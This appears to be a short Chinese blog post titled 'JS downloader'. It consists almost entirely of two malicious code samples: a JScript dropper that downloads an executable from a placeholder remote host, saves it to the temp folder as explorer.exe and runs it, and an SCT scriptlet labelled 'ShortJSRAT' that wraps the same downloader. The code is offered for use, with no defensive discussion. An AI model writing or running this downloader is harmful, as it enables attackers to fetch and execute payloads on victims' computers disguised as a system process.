JS下载者

发表于 | 分类于 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://x.x.x.x/bd.exe", false);
xhr.send();
if (xhr.Status == 200) {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Open();
    stream.Type = 1;
    stream.Write(xhr.ResponseBody);
    stream.Position = 0;
    if (fso.FileExists(filepath)){
        fso.DeleteFile(filepath);
    }
    stream.SaveToFile(filepath);
    stream.Close();
    new ActiveXObject("WScript.Shell").Exec(filepath);
}

SCT:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
        	var WSHShell = new ActiveXObject("WScript.Shell");
        	path = WSHShell.ExpandEnvironmentStrings("%temp%");
    		var filepath = path+"/explorer.exe";
    		var xhr = new ActiveXObject("MSXML2.XMLHTTP");
    		xhr.open("GET","http://x.x.x.x/bd.exe", false);
    		xhr.send();
    		if (xhr.Status == 200) {
        		var fso = new ActiveXObject("Scripting.FileSystemObject");
        		var stream = new ActiveXObject("ADODB.Stream");
        		stream.Open();
        		stream.Type = 1;
        		stream.Write(xhr.ResponseBody);
        		stream.Position = 0;
                if (fso.FileExists(filepath)){
                   fso.DeleteFile(filepath);
                }
        		stream.SaveToFile(filepath);
        		stream.Close();
        		new ActiveXObject("WScript.Shell").Exec(filepath);
    		}


        ]]>
</script>
</registration>
</scriptlet>

------本文结束,感谢阅读------

Gitalking ...